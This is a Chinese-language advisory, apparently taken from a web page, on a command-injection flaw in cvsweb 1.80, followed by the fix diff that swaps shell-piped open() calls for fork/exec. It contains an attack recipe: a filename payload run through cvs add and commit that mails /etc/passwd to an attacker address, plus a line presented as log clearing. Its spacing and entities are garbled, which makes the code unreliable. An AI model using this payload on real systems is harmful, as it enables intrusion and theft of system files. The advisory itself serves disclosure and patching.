Cvsweb1.80存在一个漏洞,可以给入侵者提供一个shell的接入,首先该攻击者必须具有一对cvs库的写权限。
攻击者的常用格式如下:
SHELLCODE=";perl-e\$_=q{mailfoo#bar.baz$#@60;!etc!passwd};y:!#:\x2F\x40:;system\$_;"
touch$SHELLCODE
cvsadd$SHELLCODE
cvscommit-m$SHELLCODE
然后攻击者通过浏览cvsweb页面而执行这些放入的木马程序。或者等待其它人员浏览该页面。这将会把系
统的/etc/passwd文件发送到攻击者信箱。
由于留有日志记录,可以通过下面的代码清除日志。
open($fh,"rlog$filenames2$#@62;/dev/null|")
下面是漏洞补丁程序:
1.86版本已经释放,同时修复了该漏洞。
---cvsweb.cgi2000/05/2407:10:311.10
+++cvsweb.cgi2000/07/0703:32:21
@@-1185,23+1185,22@@
}
if(defined($rev)){
-$revopt="-r$rev";
+$revopt="-r$rev";
}
else{
$revopt="";
}
-#thismaynotbequotedwithsinglequotes
-#inwindows..butshouldinU*nx.there
-#isafunctionwhichallowsforquoting`evil`
-#characterssomewhere,Iknow(buriedinthePerl-manpage)
-##
###justfortherecord:
###cvscoseemstohaveabugregardingsinglecheckoutof
###directories/fileshavingspacesinit;
###thisisanissuethatshouldberesolvedoncvssside
-open($fh,"cvs-d$cvsrootco-p$revopt$where2$#@62;&1|")||
-&fatal("500InternalError","Couldntco:$!");
+#
+#Safelyforkachildprocesstoreadfrom.
+if(!open($fh,"-|")){#child
+open(STDERR,"$#@62;&STDOUT");#Redirectstderrtostdout
+exec("cvs","-d$cvsroot","co","-p",$revopt,$where);
+}
#===================================================================
#Checkingoutsquid/src/ftp.c
#RCS:/usr/src/CVS/squid/src/ftp.c,v
@@-1298,7+1297,7@@
subdoDiff{
my($fullname,$r1,$tr1,$r2,$tr2,$f)=@_;
my$fh=do{local(*FH);};
-my($rev1,$rev2,$sym1,$sym2,$difftype,$diffname,$ $f2);
+my($rev1,$rev2,$sym1,$sym2,@difftype,$diffname,$f1,$f2);
if($r1=~/([^:]+)(:(.+))?/){
$rev1=$1;
@@-1333,25+1332,25@@
}
my$human_readable=0;
if($feqc){
-$difftype=-c;
+@difftype=qw{-c};
$diffname="Contextdiff";
}
elsif($feqs){
-$difftype=--side-by-side--width=164;
+@difftype=qw{--side-by-side--width=164};
$diffname="SidebySide";
}
elsif($feqH){
$human_readable=1;
-$difftype=--unified=15;
+@difftype=qw{--unified=15};
$diffname="LongHumanreadable";
}
elsif($feqh){
-$difftype=-u;
+@difftype=qw{-u};
$human_readable=1;
$diffname="Humanreadable";
}
elsif($fequ){
-$difftype=-u;
+@difftype=qw{-u};
$diffname="Unidiff";
}
else{
@@-1361,22+1360,19@@
#applyspecialoptions
if($human_readable){
if($hr_funout){
-$difftype=$difftype.-p;
+push@difftype,-p;
}
if($hr_ignwhite){
-$difftype=$difftype.-w;
+push@difftype,-w;
}
if($hr_ignkeysubst){
-$difftype=$difftype.-kk;
+push@difftype,-kk;
}
}
-##cvsrdiffdoesntsupport-pand-woption..sad
-#open($fh,"cvs-d$cvsrootrdiff$difftype".
-#"-r$rev1-r$rev2$where2$#@62;&1|")
-#||&fatal("500InternalError","Couldntcvsrdiff:$!");
-###
-open($fh,"rcsdiff$difftype-r$rev1-r$rev2$fullname2$#@62;&1|")
-||&fatal("500InternalError","CouldntGNUrcsdiff:$!");
+if(!open($fh,"-|")){#child
+open(STDERR,"$#@62;&STDOUT");#Redirectstderrtostdout
+exec("rcsdiff",@difftype,"-r$rev1","-r$rev2",$fullname);
+}
if($human_readable){
http_header();
&human_readable_diff($fh,$rev2);
@@-1402,7+1398,7@@
#---src/sys/netinet/tcp_output.c1995/12/0517:46:351.17RELENG_2_1_0
#(bogusexample,but...)
#
-if($difftypeeq-u){
+if(grep{$_eq-u}@difftype){
$f1=---;
$f2=\+\+\+;
}
@@-1455,15+1451,19@@
return;
}
-my($filenames)=join("",@files);
if($tag){
#cantuse-r$#@60;tag$#@62;as-isallowedintagnames,butmisinterpreatedbyrlog..
-open($fh,"rlog$filenames2$#@62;/dev/null|")
-||&fatal("500InternalError","FailedtospawnGNUrlog");
+if(!open($fh,"-|")){
+close(STDERR);#rlogmaycomplain;ignore.
+exec("rlog",@files);
+}
}
else{
-open($fh,"rlog-r$filenames2$#@62;/dev/null|")
-||&fatal("500InternalError","FailedtospawnGNUrlog");
+my$kidpid=open($fh,"-|");
+if(!$kidpid){
+close(STDERR);#rlogmaycomplain;ignore.
+exec("rlog","-r",@files);
+}
}
$state="start";
while($#@60;$fh$#@62;){
@@-1591,7+1591,7@@
}
if($.==0){
fatal("500InternalError",
-"FailedtospawnGNUrlogon$#@60;em$#@62;$filenames$#@60;/em$#@62;$#@60;p$#@62;didyousetthe
$#@60;b$#@62;\$ENV{PATH}$#@60;/b$#@62;inyourconfigurationfilecorrectly?");
+"FailedtospawnGNUrlogon$#@60;em$#@62;".join(",",@files)."$#@60;/em$#@62;$#@60;p$#@62;didyousetthe
$#@60;b$#@62;\$ENV{PATH}$#@60;/b$#@62;inyourconfigurationfilecorrectly?");
}
close($fh);
}
@@-1618,9+1618,14@@
undef%log;
print("Goingtorlog$fullname\n")if($verbose);
-open($fh,"rlog$revision$fullname|")
-||&fatal("500InternalError","Failedtospawnrlog");
-
+if(!open($fh,"-|")){#child
+if($revisionne){
+exec("rlog",$revision,$fullname);
+}
+else{
+exec("rlog",$fullname);
+}
+}
while($#@60;$fh$#@62;){
printif($verbose);
if($symnames){
解决方法:
相关文章